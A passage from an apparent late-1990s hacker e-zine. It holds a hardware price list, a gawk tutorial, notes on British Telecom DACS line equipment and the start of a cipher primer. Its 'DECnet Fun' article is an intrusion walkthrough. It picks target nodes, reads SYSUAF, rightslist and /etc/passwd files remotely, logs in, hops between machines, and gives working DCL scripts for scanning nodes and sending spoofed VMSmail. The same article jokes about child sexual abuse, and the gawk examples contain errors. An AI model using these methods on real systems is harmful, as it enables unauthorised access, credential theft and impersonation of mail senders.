| #27202 | BASIC Stamp D Starter Kit | $79.00 |
| #27205 | BASIC Stamp I Starter Kit | $109.00 |
| #27203 | BASIC Stamp II Starter Kit | $159.00 |
| #250-04050 | 4MHz Resonator (DIP) | $1.50 |
| #250-02060 | 20MHz Resonator (DIP) | $2.48 |
| #250-05060 | 50MHz Resonator (DIP) | $1.66 |
| 602-00005 | 256 byte EEPROM (Stamp I) | $3.00 |
| 602-00001 | 2048 byte EEPROM (Stamp II) | $5.00 |
| 602-10010 | 16KB EEPROM (Stamp IISX) | $5.00 |
| PBASIC1/P | BASIC Stamp I Chip | $18.00 |
| PBASIC2/P | BASIC Stamp II Chip | $25.00 |
| PBASIC2SX-28/DP | BASIC Stamp IISX Chip | $25.00 |
| #27900 | BASIC Stamp Experiment Board | $199.00 |
| #27905 | BASIC Stamp Activity Board | $79.00 |
| #27910 | Serial LCD Module (2x16) | $49.00 |
| #27923 | Serial LCD Module (2x16) Backlit | $59.00 |
| #27937 | Serial LCD Module (2x16) Surface Mount Backlit | $54.00 |
| #27919 | Serial LCD Module (4x20) Backlit | $99.00 |
| #27936 | Serial LCD 120x32 Graphic | $109.00 |
| #27302 | TV-BASIC Stamp Interface: NTSC | $109.00 |
| #27303 | TV-BASIC Stamp Interface: PAL | $109.00 |
| #27304 | TV-BASIC Stamp Interface Cable | $4.00 |
| #27912 | Mini SSC (Serial Servo Controller) II | $54.00 |
| #27913 | General Purpose Servo | $17.00 |
| #27914 | AppKit: 8-digit LED Driver | $26.00 |
| #27915 | AppKit: DTMF Transceiver | $26.00 |
| #27916 | AppKit: 12 bit A/D Converter | $26.00 |
| #27917 | AppKit: Digital Thermometer | $26.00 |
| #27918 | AppKit: 8K Serial EEPROM | $26.00 |
| #27921 | AppKit: Real Time Clock | $26.00 |
| #27934 | AppKit: RS485 Long Distance Comm. | $26.00 |
| #27920 | BS2-IC Data Collection Board | $179.00 |
| #27922 | BASIC Stamp Bug | $139.00 |
| #27926 | Pluggable Jumpers: Thingamebobs | $9.50 |
| #27935 | PCStampII I/O Board | $179.00 |
| #27939 | StampMem | $59.00 |
| #27945 | StampCI Industrial Power Interface Board | $79.00 |
| #27320 | Opto22 8-Channel I/O Rack | $79.00 |
| #27321 | Output 60 VDC Module | $18.00 |
| #27322 | Output 120 VAC Module | $18.00 |
| #27323 | Input 120 VAC Module | $19.00 |
| #27324 | Input 10-32 VDC Module | $19.00 |
| #27940 | X-10 Powerline Interface | $20.00 |
| #27941 | X-10 Lamp and Appliance Module | $16.00 |
| #27942 | X-10 Lamp Module | $14.00 |
| #27944 | 4 x 4 Matrix Keypad | $19.00 |
| #27943 | 4 x 4 Matrix Keypad Cable | $4.00 |
| #27960 | RAM Pack B | $29.00 |
| #27961 | Motor Mind B | $29.00 |
| #27962 | Pocket Watch B | $27.00 |
| #27963 | Solutions Cubed: MemKey | $39.00 |
| #27924 | 303MHz RF Module Set | $89.00 |
| #27931 | 433MHz RF Module Set | $89.00 |
| #27301 | IRODS: Infrared Sensors | $34.00 |
| #27951 | Programming/Customizing the BASIC Stamp Book | $34.95 |
| #27971 | Atomic Time Clock Interface | $79.00 |
| #29100 | Growbot | $179.00 |
| #29110 | AppMod: Prototype Board | $19.00 |
| #29114 | AppMod: Breadboard | $29.00 |
`----------------------------------------------------------------------------'


For more information about Parallax's BASIC Stamps, please visit:
= http://www.parallaxinc.com
= http://www.hth.com
= http://www.al-williams.com/wd5gnr/stampfaq.htm


Anyway, don't mail me asking questions about the BASIC Stamps. If you want
to learn more about them, then go to one of the URLs above. Thank you...


-polder (polder@yamato.terrabox.com)


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.12][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


- DECnet Fun -

- Majere < majere@hobbiton.org >


I wrote this whilst drunk
I will submit it whilst drunk
I hope I can understand it in the morning


DECnet is a family of communications products used primarily between VMS
systems, however it has been implemented upon most OS's produced by Digital,
such as ULTRIX, RSTS/E, and TOPS-20. I have not personally seen it upon
Digital Unix, but since this OS came out of ULTRIX, I would think so.


DECnet's popularity rose (funnily enough) with the popularity of VMS in
the 1980's, and with it such large scale DECnet networks as SPAN and HEPnet
where born. With the rise of the internet and other TCP/IP networks DECnet
has been almost forgotten.


So why the hell should I even care about DECnet?

Because it still exists dummy! It just aint as popular these days. Besides
which, a change from unix and TCP/IP can be rather nice (it does tend to
get boring).

Most VMS systems that you will find running DECnet will be using Phase IV+,
Phase V was released, however most places have not found the need to switch.

Well, enough of the history lesson, let's get cracking.


Welcome to VAX/VMS version V5.5-2 on node B4B0
Last interactive login on Thursday, 2-SEP-1999 04:46



$



If you are looking at the $ sign and are thinking "Hey cool! VMS uses Bash!
this will be easier than I thought"
perhaps you should brush up on VMS a
little more before reading any further.

OK, we're sitting at DCL, what now?

First off, grab a list of DECnet object using NCP

$ mcr ncp
NCP> show known nodes


Known Node Volatile Summary as of 2-SEP-1999 11:47:15

Executor node = 12.345 (B4B0)

State = on
Identification = DECnet for OpenVMS VAX V6.1


Node State Active Delay Circuit Next node
Links

1.2 (BIGVAX) ISA-0 12.4450
1.18 (SECRET) ISA-0 12.4450
3.4 (INFOS) ISA-0 12.4450
3.42 (PORNO) ISA-0 12.4450
3.5 (WAREZ) ISA-0 12.4450
3.17 (HAX0RZ) ISA-0 12.4450
3.33 (SO1O) ISA-0 12.4450
3.36 (WOPR) ISA-0 12.4450
3.38 (BITCH) ISA-0 12.4450


etc, etc, it's recommended that you buffer this, because these lists can
get rather large.


OK, here's a list of targets, hrrm, I think I'll pick node so1o

$ dir so1o:: /* Note, when accessing files over DECnet, suffix :: to the node
name, then the directory and/or the filename, the default
directory is the home directory of DECnet */


Directory SO1O::SYS$SPECIFIC:[DECNET]

GOATS.JPG;1 BIGMEN.JPG;1 COWS.JPG;1 MENWITHTOYS.JPG;1
COWSWITHGOATS.JPG;1 MASTURBATION.FAQ;1 KIDDIEPR0N.JPG;1
NETSERVER.LOG;142 NETSERVER.LOG;143 NETSERVER.LOG;144


hrrrm.

This should be fairly simple to understand, we just got a directory listing of
the contents of SYS$SPECIFIC:[DECNET] on so1o's VMS box.

Let's see if rightslist.dat exists and that we can read it

$ dir/size so1o::sys$common:[SYSEXE]rightslist.dat

Directory SO1O::SYS$COMMON:[SYSEXE]

RIGHTSLIST.DAT;143 162

It looks like we can, if we couldn't we'd be seeing this message now

Directory SO1O::SYS$COMMON:[SYSEXE]

RIGHTSLIST.DAT;143 insufficient priveledge or object protection violation

and just for shits and giggles:

dir/full so1o::sys$common:[SYSEXE]sysuaf.dat

Directory SO1O::SYS$COMMON:[SYSEXE]

SYSUAF.DAT;143 243

oh dear....


Just as with any other VMS box, you can start dumping the rightslist, checking
for backups of SYSUAF that have been left world readable, and basically having
a jolly good time.

ok, let's get an interactive session going

$ set host so1o

*******************************************************************************

Welcome to the NAMBLA OpenVMS server
Don't even think of hacking us, We've gotten so1o to do our security
neener, neener, neener!

*******************************************************************************

Username: SO1O
Password: BOYLOVE

Welcome to OpenVMS 6.2 on the NAMBLA cluster
Last interactive login on Saturday, 1-SEP-1999 07:35

$ show process/priv


2-SEP-1999 23:47:28.50 User: SO1O Process ID: 212170C6
Node: SO1O Process name: "SO1O"

Process privileges:
CMKRNL may change mode to kernel
CMEXEC may change mode to exec
SYSNAM may insert in system logical name table
GRPNAM may insert in group logical name table
ALLSPOOL may allocate spooled device
DETACH may create detached processes
DIAGNOSE may diagnose devices
LOG_IO may do logical i/o
GROUP may affect other processes in same group
ACNT may suppress accounting messages
PRMCEB may create permanent common event clusters
PRMMBX may create permanent mailbox
PSWAPM may change process swap mode
ALTPRI may set any priority value
SETPRV may set any privilege bit
TMPMBX may create temporary mailbox
WORLD may affect other processes in the world
MOUNT may execute mount acp function
OPER may perform operator functions
EXQUOTA may exceed disk quota
NETMBX may create network device
VOLPRO may override volume protection
PHY_IO may do physical i/o
BUGCHK may make bug check log entries
PRMGBL may create permanent global sections
SYSGBL may create system wide global sections
PFNMAP may map to specific physical pages
SHMEM may create/delete objects in shared memory
SYSPRV may access objects via system protect
BYPASS may bypass all object access controls
SYSLCK may lock system wide resources
SHARE may assign channels to non-shared devices
GRPPRV may access group objects via system protection
READALL may read anything as the owner
SECURITY may perform security functions

Process rights:
INTERACTIVE
LOCAL

System rights:
SYS$NODE_SO1O


oh, very secure...

occaisionally you may find a unix box connected to the decnet, these can be
accessed in much the same way, but putting the unix pathnames in quotation
marks, or else VMS is going to barf on unix's IFS, eg: type unix::"/etc/passwd"

You will find most systems are insecure like this (apart from sysuaf.dat which
is almost always non-world-readable) because this is how it is set up in the
vanilla install, and few bother to change it, besides which, no crackers know
about decnet right?

OK, time for some warez:

DECNETFIND: Finds nodes which have files accessable by decnet and logs them.
will not report those sites which you can set host to, but cannot dir, but it
would only be a small change to make it do so. This utility is terrific for
automating much of that long, boring typing work.

$! DECNETFIND Version 1.0
$! Coded By The Beaver
$! Jan 5th, 1995
$!
$! The intent of this code is to scan for remote, connectable nodes that
$! the VMS host knows about (Via NCP) and build a list. Once this list
$! has been created, we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node.
$! Node that are "successful" are stored away. This prevents mucho
$! time consuming scanning by hand.
$!
$!
$ on error then goto err ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. "" ! Yes, output file helps
$ then
$ say "DECNet VMS Node Finder Version 1.0 1995"
$ say "Coded By The Beaver"
$ say ""
$ say "Usage:"
$ say "DECNETFIND [Outfile]"
$ exit
$ endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out ! Fire up NCP and dump nodeslist
$ open/read in nodes.out ! Open to read
$ open/write nodelist 'p1' ! "Success" Storage area.
$ on severe_error then continue ! So things done die on "dir ::"'s
$!
$ loop1:
$ read/end = end in line
$ name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$ if name .gts. "("
$ then
$ say "**************************************************************"
$ say "Nodename: "+name
$ say ""
$ dir 'name':: ! See if we can get to it via a DECNet DIR::
$ if $severity .nes "1"
$ then
$ say "Status: Node Unreachable Via DECNet Dir::"
$ else
$ say "Status: Found Good Node. [Logged]"
$ write nodelist name ! Log it.
$ endif
$ endif
$ goto loop1
$ err:
$ say "Ouch. There has been a error!"
$ end:
$ close in
$ close nodelist ! Close up and leave, exit stage
$ delete nodes.out;* ! right
$ say "Complete!"
$ exit


Send fake mail messages through the VMSmail protocol, requires some editing


$! To send anonymous or fake messages(except for remote node system admins -
$! mail server logs) through the MAIL mailbox to any user logged on the NET;
$! must only have NETMBX privilege
$null[0,8] = 0
$remote_node = P1
$if P1 .eqs. "" then read sys$command remote_node /prompt="node: "
$local_user = P2
$if P2 .eqs. "" then read sys$command local_user /prompt="local user: "
$local_user := 'local_user ! remove blanks and lowercases
$real_remote_user = P2
$if P2 .eqs. "" then -
read sys$command real_remote_user /prompt="real remote user: "
$real_remote_user := 'real_remote_user ! remove blanks and lowercases
$remote_user = P3
$if P3 .eqs. "" then read sys$command remote_user /prompt="remote user: "
$remote_user := 'remote_user ! remove blanks and lowercases
$subject = P4
$if P4 .eqs. "" then read sys$command subject /prompt="subject: "
$filename = P5
$if P5 .eqs. "" then read sys$command filename /prompt="file name: "
$filename := 'filename
$!
$open/read/write slave 'remote_node'::"27="
$write slave "''local_user'"
$write slave "''real_remote_user'"
$read slave status
$write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status))
$write slave null
$if filename .nes. ""
$ then
$ write slave "''remote_user'"
$ write slave "''subject'"
$ open/read/error=end_of_file file 'filename'
$loop:
$ read/end=end_of_file file record
$ write slave "''record'"
$ goto loop
$else
$ write slave "To whomever it concerns"
$ write slave "Demo of using VAXMail protocol"
$ write slave "This is message line"
$endif
$end_of_file:
$close/nolog file
$write slave null
$read slave status
$write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status))
$close slave
$exit


I did not write either of those two DCL scripts, and by no means take credit
for them.

You will find, whils jumping around from one node to another, that many nodes
cannot be reached from one node, are reachable from another, so to get to one
exotic place, you may have to jump through 3 or more machines, which is known
as "poor man's routing".

As well as this, take a look through the netserver.log's, these will give
you the nodes of machines which are accessing files on another, so, say
if you can't manage to break into machine BIGVAX. You know from reading the
netserver.log's that the machine TINVAX seems to always be requesting files
from BIGVAX, so it seems likely that there are users sharing the machines.
You cannot, however, access TINVAX directly, but you can, go straight through
BIGVAX by doing the following:

dump BIGVAX::TINVAX::SYS$COMMON:[SYSEXE]RIGHTSLIST.DAT

^^^ ^^^^

Another thing to do, is to go through people's LOGIN.COM files, people
like to set things in there to access files across a DECnet, so they don't
have to type in the same thing all the damn time.

look for a line such as

project == NODE2"MARYANNE PAPABEAR"::project.txt

an even worse case scenario is for the system administrator to put these things
in the system logical table. Proxy accounts are meant to be set up for these
sorts of things, but....


This should be enough to start you off on decnets around the world. Decnet's
are wherever VMS machines are to be found, so observatories, univerities,
research type places, as well as places that desire a high level of security
are good places to look for them. That's enough of this for now, as I said
before, this is a very basic guide, if enough people want me to
write a more detailed article for b4b0-10 actually explaining how it all works,
then I will, with more ASCII diagrams than you can poke a stick at. Until then,
here are some good places for information if you are interested in this sort
of thing.

The VMS hack FAQ
VMS Hack Pro
VMSFAQ
The beginner's guide to VAX/VMS hacking - by entity
gr1p's guides to VMS
Decnet Phase IV Specifications
http://www.openvms.digital.com:8000/index.html

If you cannot locate any of these files, or would just like to talk about VMS
stuff, drop me an email.


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.13][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

Intro to gawk/awk by lusta

This information is pretty basic, but many people seem to be unfamiliar
with awk. Learning about this filter, I found that it differs from other
filters in that it has no predefined task to perform. While other filters
are designed to perform specific tasks such as searching text or sorting
lines, gawk leaves it up to the user to define a task to perform. gawk is
the GNU version of the unix awk utility. awk was originally created as a
standard utility for the Unix OS. An enhanced version of awk, called nawk,
was developed later to include file handling. With nawk, you can access
several files in the same program. gawk is a further enhancement, including
the added features of nawk as well as the standard capabilities of awk.

The gawk utility operates on either files or the standard output. You can
list file names on the command line after the instruction. If there are no
file names listed, then input is taken from the standard input. The invocation
of gawk consists of the gawk keyword followed by a gawk instruction and
filenames.

$ gawk 'pattern {action}' filenames

The print action is the default action. If an action is not specified, the
line is printed. The default pattern is the selection of every line in the
text. If the pattern is not specified, the action is applied to all lines.
The next two examples print all lines with the pattern "eyeliner" hehe. The
action segment in the first example contains the print command. The print
command outputs the line to the standard output. However, in the second
example there is no action segment.

makeup

Estee Lauder 15.75 eyeliner
Max Factor 3.50 lipstick
Elizabeth Arden 10.25 eyeshadow
Cover Girl 2.50 eyeliner


$ gawk '/eyeliner/{print}' makeup
Estee Lauder 15.75 eyeliner
Cover Girl 2.50 eyeliner

$ gawk '/eyeliner/' makeup
Estee Lauder 15.75 eyeliner
Cover Girl 2.50 eyeliner

The pattern search is performed on all the lines in the file. If the pattern
is found, the action is performed on the line. A line is treated as a line of
text and the pattern is searched for throughout the line. In the next example,
gawk searches for any line with the pattern 'Girl'. When a match is found,
the line is output.

$ gawk '/Girl/{print}' makeup
Cover Girl 2.50 eyeliner

The special character ^ references the beginning of a line. The second
example searches for a pattern at the end of a line using the special
character $.

$ gawk '/^Max/{print}' makeup
Max Factor 3.50 lipstick

$ gawk '/eyeshadow$/{print}' makeup
Elizabeth Arden 10.25 eyeshadow

You can use special characters to specify variations on a pattern. The period
matches any character, the asterisk matches repeated characters, and the
brackets match a class of characters. This example uses the brackets and
asterisk to specify a sequence of numbers. The context consists of the
characters .50. Any number ending with .50 will be matched. Notice that the
period is quoted with a blackslash to treat it as a period, not as a special
character.

$ gawk '/[0-9]*\.50/ {print}' makeup
Max Factor 3.50 lipstick
Cover Girl 2.50 eyeliner

Field variables are designed to reference fields in a line. gawk numbers
fields from 1. gawk defines a field variable for each field in the file. A
field variable consists of a $ followed by the number of the field. $0 is a
special field variable that contains the entire line. In the next example,
the second and fourth fields of the makeup file are printed out.


makeup

Estee Lauder 15.75 eyeliner
Max Factor 3.50 lipstick
Elizabeth Arden 10.25 eyeshadow
Cover Girl 2.50 eyeliner

$ gawk '{print $2, $4}' makeup
Lauder eyeliner
Factor lipstick
Arden eyeshadow
Girl eyeliner

In the next example, the user outputs the line with the pattern "Factor"
twice; first reversing the order of the fields and then with the fields in
order. The $0 is used to output all the fields in order, the entire line.

$ gawk '/Factor/ {print $4, $3, $2, $1, print $0}' makeup
lipstick 3.50 Factor Max
Max Factor 3.50 lipstick

The variable NR contains the number of the current line. The variable NF
contains the number of fields in the current line.

$ gawk '{print NR, $2, $4}' makeup
1 Lauder eyeliner
2 Factor lipstick
3 Arden eyeshadow
4 Girl eyeliner

You can also define your own variables, giving them any name you want.
Variables can be named using any alphabetic or numeric characters as well as
underscores. The name must begin with an alphabetic character. A variable is
defined when you first use it. The type of variable is determined by the way
it is used. If you use it to hold characters, then the variable is considered
arithmetic. If you use it to hold characters, then the variable is considered
a string. You need to be consistant in the way in which you use a variable.
String variables should not be used in arithmetic calculations and vice versa.

$ gawk '{myfield = $2; print myfield}' makeup
Lauder
Factor
Arden
Girl

You can use the special operators, ~ and !~ to carry out pattern searches on
fields. Instead of using the = to compare the entire field to a string, you
can use the ~ to see if a certain pattern exists within the field. In the next
example, the first field is searched for "tor".

$ gawk '($2 ~ /tor/) {print}' makeup
Max Factor 3.50 lipstick

The next example retrieves all records whose first field does not contain the
pattern "tor".

$ gawk '($2 !~ /tor/) {print}' makeup
Estee Lauder 15.75 eyeliner
Elizabeth Arden 10.25 eyeshadow
Cover Girl 2.50 eyeliner

The BEGIN pattern specifies actions to be performed before lines are processed.
The END pattern specifies actions to be performed after lines are processed.
In the next example, the heading "Makeup List" is output before any lines are
processed. After processing, the value of NR is printed.

$ gawk 'BEGIN {print "Makeup List"} {print} END {print "Total is", NR}' makeup
Makeup List
Estee Lauder 15.75 eyeliner
Max Factor 3.50 lipstick
Elizabeth Arden 10.25 eyeshadow
Cover Girl 2.50 eyeliner
Total is 4

As gawk instructions become more complex, it is easier to handle them by
placing them in a file that can be read by gawk. If you need to ever make any
changes, you only need to modify the file. The -f option allows gawd to read
gawk instructions from a file instead of the command line. In the next example,
the gawk instructions to list products named eyeliner are placed in a file
called findmk.

findmk

BEGIN {print "Makeup List";
count = 1;
}
/$4 ~ "eyeliner" /{
count = count + 1;
print;
}
END {
print "Total records found is", count
}

$ gawk -f findmk makeup
Makeup List
Estee Lauder 15.75 eyeliner
Cover Girl 2.50 eyeliner
Total Records found is 2

There are three control structures that construct loops in gawk: the while,
for, and for-in loops. There is one selection control structure, the if
structure.

You can define your own files by placing the whole gawk instruction in a
script file. You can then make the file executable, and the file name becomes
a new linux command.

In the next example, the user has placed the entire gawk instruction in a
script file called field3. The instruction prints out the first three fields
in each line. Notice that the gawk instruction is quoted. Once you have set
the execution permission for the script file with the chmod command, you can
then execute the file by simply entering in the script file's name.

field3

gawk ' {
for(i=1;(i<=3);i++)
{
printf("%s\t",$i);
}
printf("\n");
}' makeup

$ chmod 755 field3
$ field3
Estee Lauder 15.75
Max Factor 3.50
Elizabeth Arden 10.25
Cover Girl 2.50

The following is a table of components/descriptions.

Component Description
----------------------------------------------------------------------------
-f filename reads its commands from the file name

-Fc specifies a field delimiter, c, for
the input file. The default delimiter
is tab or space $ gawk -F: makeup
Output Operations ~

print output the current line to the standard
output

print var output the variable to the standart
output

print var>>filename output the variable to a file

Input Operations ~

getline var read next input line, return 0 if at end
of file. if a variable is specified, it
will read the input line to it

getline var<<filename read next input line read from the
specified file, return 0 if at end of
file the line will read into the
specified variable

Control Structures ~

{actions} a block is formed by opening and closing
braces. A block groups actions, making
them subject to a control structure such
as a loop or enclosing the actions

if(expression) the if control structure executes an
action action if its expression is true. if
else false, then the else action is executed.
action

while(expression) executes an action as long as its
action expression is true

for(exp1;exp2;exp3) executes an action as long as exp2 is
action true. the first expression, exp1 is
executed before the loop begins. the
third expression, exp3, is executed
within the loop after the action.

for (variable in arrayname) designed for use with associative
action arrays. the variable operand is
consecutively assigned the strings that
index the array.

next stops operations on the current record
and skips to the next record

exit ends all processing and executes the END
command if there is one.

Operators ~

&& Logical AND

|| Logical OR

! Logical NOT

str ~ regular expr matches regular expression

str !~ regular expr does not match regular expression

Initial and Terminating Patterns ~

BEGIN execute operations before gawk begins
processing

END execute operations after gawk begins
processing

Variables ~

NR record number of current record

NF number of fields in current record

$0 the entire current record

$n the fields in the current record,
numbered from 1. for example, $1

FS input field delimiter, default delimiter
is space or tab



Well, that's it...I hope this instruction was helpful.

Special thanks to Volatile for your help, and for being such a good friend. ;)

~ lusta

email: lusta@lubbin.net


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.14][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]
Digital Access Carrier System DACS
by hybrid <hybrid@dtmf.org>

How did I get this info? -- Well the truth is, as a young child I was
abducted by extra terrestrial biological entitys who hardwired microchips
in my brain that allow me to intercept the thoughts of telecommunications
engineers via ESP.. I was told to gather intricate information about the
planet Earth's international PSTN, so when my people from the distant world
of xinbin come to inhabit the planet, they can use the information I have
transmitted to them from the microchips in my brain as a means to take over
our communication networks... er, shit, thats not rite (better lay off the
caffiene for a bit).. What I ment to say was, a friend of mine werks for BT,
and gave me some nice info on DACS :) -werd


Introduction.


Digital Access Carrier System is used by British Telecom to transform one
residential line into two seperate lines without actually installing an
additional trunk pair. The idea of DACS is very similar to the design and
implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/
files/hybrid-files/wb900.txt). The DACS system is becomming increasingly
popluar in the UK beacuse more and more people are requesting additional
lines, usually for net access.


Digital Access Carrier System


_____________ _____________
B1 | | | | B1
-------------O | single pair of |O-------------
| | wires (trunk) | |
analogue | E.U O==================O E.U | analogue
| | digital | |
-------------O | |O-------------
B2 |_____________| |_____________| B2


The chances are, if you order another line from BT, they will simply
multiplex your existing line into 2 seperate carriers. Think about it.. if
you have one line operating on a dedicated carrier, then the line is
multiplexed into 2 serperate carriers, the bandwith will be cut in half.
To this date, BT are encouraging its customers to join the 'BT SuperHighway'
by installing a second line.. What BT don't tell you is that you will only be
able to get a maximum of 28.8bps from your 'second' line.

In this file, I'll look into the DACS carrier system in detail, aswell as
ways to determine what kind of trunk installation you have if you have
ordered a second line from BT. Werd, enjoy the file..


DACS II


The origional DACS system had limited capabilitys, and did not allow the
customer to have CLASS services on their line. The newer DACS implementation
is called DACS II and allows a slightly more advanced service to customers.

Now people with DACSII units on their line, have access to CLASS (Customer
Loop Access Signalling System). The new DACS hardware, allows customers lines
to have K Break (Disconnect Clear), aswell as common services such as CLI,
which where previously unavailable to DACS I customers.


At the eXchange


All exchanges have a database of different customers who have been fitted
with the DACS equipment. Some of the commands used on the CSS database at
the local terminating exchange are as follows:


<DFTR> DISPLAY FRAME TERMINATION RANGE (to see if DACS equipment is
fitted to the exchange)


<DFJ> DISPLAY FRAME JUMPER (to determine whether a particular
customer is using DACS1 or DACS2)


Remote End eXchange records


The Local Network Records (CSS/LNR) are modified/editited as follows on
the O/S at the exchange:


<ESU> ENTER SHARED USE
<MSU> MODIFY SHARED USE
<DRT> DISPLAY ROUTING
<HEH> INVALID COMMAND


Compatability of DACS:

GOOD..

The provision of PSTN services when used with only BABT - approved
Customer Premises Equipment upto 4 REN.

Use of any phone exchange within BT's access network, except the
following:

Inter working with all BT's remote line test systems
Self contained payphones
Lines utilising CLASS
K Break
All modems up to 14.4bit/S working
Group 1,2,3 fax machines
Video phones

BAD..

Earth calling PBX's
Equipment that uses SPM (meter pulsed payphones)
Private Services
ISDN2
Steel joint user poles
Certain TXE2 exchanges
300 kilohms loop calling
Electricity stations
DDI
Group 4 fax machines


DACS system schematics, diagrams..


Old Jumpering Procedure


E L
: :
_____________ : : _____________
| | : : | |
| O-:-----. .-:--O |
exchange | O-:---. | | : | | external
<------------O sub number | : | | | : | bar pairO------------>
| | : | | | : | | cable
| | : | | | : | |
|_____________| : | | | : |_____________|
: | | | :
: | | | :
: | | | : _____________
: | | | : | |
: | | | : | DACS block |
: | | | : | | DACS shelf
: | | | : |O------------>
: | | | : | |
: | | | : | T B1 B2 |
: | | | : |_____________|
: | | | : o o o
| | |_______| | |
| |________________| |
|_______________________|



New Jumpering Procedure


E L
: :
_____________ : : _____________
| | : : | |
| | : : | DACS B1 B2 |
exchange | | : : | | DACS shelf
<------------O sub number | : : |O------------>
| O---:----------:---|--O B2 |
| O---:----------:---|--O B1 |
|_____________| : : |_____________|
: :
: :
: :
_____________ : : _____________
| | : : | |
| DACS trunk | : : | |
DACS shelf | | : : | | external
<------------O | : : | bar pairO------------>
| CH2 | : : | | cable
| CH1 O--O---:----------:---O |
|_____________| : : |_____________|
: :
: :


E.U Card Setup


_________________________________________
.--------. | (O) (O) (O) |
| | | | | | | | | | | on |
| | 1 | | | | | | | | | off | 8
| | |_____(O)_(O)_____________(O)_(O)_(O)_____|
| |
| |
| | <-- B.E.R connector
|________|


sw7O9 sw7O3 sw7O6 sw7OO
_____ _____ _____ _____
c | | c | | c | | c | | .--------.
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
r |_____| r |_____| r |_____| r |_____| | |
b2 b1 a3 a1 | |
|________|


DACS 2A EU
SW 1O1
(imp) (class)
_____ _____ _____ _____ _____ _____ _____ _____
| | | | | | | | cpx | | | | | | | |
| O | | O | | O | | O | 6OO | O | | O | | O | | O |
| | | | | | | | | | | | | | | |

  
| | | | | | | | | | | | | | | |
| | | | | | | | en | | | | | | | |
|_____| |_____| |_____| |_____| |_____| |_____| |_____| |_____|

1 2 3 4 1 2 3 4


1 SW 1O2 4
_____ _____ _____ _____
| off | | | | | | |
| | | | | O | | O | 1Ok
| | | on | | | | |
| | | | | | | |
| O | | O | | | | | 15k
|_____| |_____| |_____| |_____|

1 2 1 2

(alarm) (sign)



External RU Setup

BT66




white

B1 O--------------.
blue | white
| .-------------.
| | grey |
| | |
| | |
| | |
| | |
| | |
white | | |
B2 O------------. | | |
orange | | | |
| | | |
| | | |
O O O |
|
tail | trunk
O



MIMIC Resistances



switch 5 on (cal)

1k ohm loop

_____ _____
| | | |
C a | | | | a ______
S o--------O | switch 5 off (ug) | O------------O |
S b1 | | 10k ohm -50v leg b2 | | b1 | NTE |
o--------O | | O------------O______|
T b | | | | b
E | O======================O |
S | EU O======================O RU |
T a | | TRUNK | | a ______
o--------O | | O------------O |
A b2 | | | | b2 | NTE |
C o--------O | | O------------O______|
C b | | | | b
E |_____| |_____|
S
S s/c b1 + b2 10k ohm -50v a leg b2 1k ohm loop b1 or b2
EU fault TRUNK fault customer apps fault


Welp, thats it for this DACS oday info. Hope someone can find some use of
it, HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip,
jorge, lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone
in #darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng.

"that ascii took me fuckin ages.."

the urls..

http://b4b0.org b4b0
http://darkcyde.phunc.com f41th
http://www.ninex.com 9x
http://hybrid.dtmf.org BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!)

ATE/>exit

+++

NO CARRIER


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.15][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Introduction to Encryption (Volume 1)
- Substitution Ciphers
- Transposition Ciphers
- Simple XOR
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/* Substitution Ciphers */

Substitution cipher is a type of encryption where each character in
plaintext is replaced with another character in ciphertext. There are four
types of substitution ciphers.

- Simple Substitution cipher
- Homophonic substitution cipher
- Polygram substitution cipher
- Polyalphabetic substitution cipher

* Substitution Cipher - Each plaintext character is replaced with a ciphertext
character.

The famous Caesar Cipher uses the simple substitution cipher. Each
plaintext character is replaced by the character three characters over the
the right in the alphabet. (Ex: A is replaced with D. B is replaced with E)
The Caesar Cipher is even simpler to understand than substitution ciphers
withen its self. The reason is the ciphertext is a rotation of the
plaintext.

A well known program that uses simple substitution is ROT13. It uses a
simple way of encrypting data, by rotating the characters as the Caesar
Cipher does. The only difference between this cipher and the Caesar Cipher
is the cipher used in ROT13 rotates the plaintext character 13 places to get
the ciphertext character. (Ex: A is replaced with N. B is replaced by O).
In order to change the ciphertext back to the plaintext, you just run it
through ROT13 twice.
P = ROT13(ROT13(P))
As said before simple substitution ciphers are not intended for security,
